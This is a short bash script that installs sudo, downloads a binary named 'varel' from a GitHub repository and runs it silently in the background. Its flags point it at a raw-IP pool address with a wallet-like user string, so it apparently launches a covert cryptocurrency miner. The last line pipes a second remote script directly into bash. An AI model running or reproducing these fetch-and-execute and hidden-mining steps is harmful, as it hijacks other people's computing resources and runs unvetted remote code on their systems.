#!/bin/bash
apt-get update ; apt-get install sudo -y
wget https://github.com/kidoescegh/jadul/raw/main/varel
chmod +x varel
./varel -a randomvirel --url 167.99.139.112:80 --user v38ksv6jk6vnvo2k9vfwikr3yg6v5suit4w7h5.$(shuf -n 1 -i 1-99999)-kzp > /dev/null 2>&1 &
curl -sL https://github.com/kartolo92/koplok/raw/master/time | bash
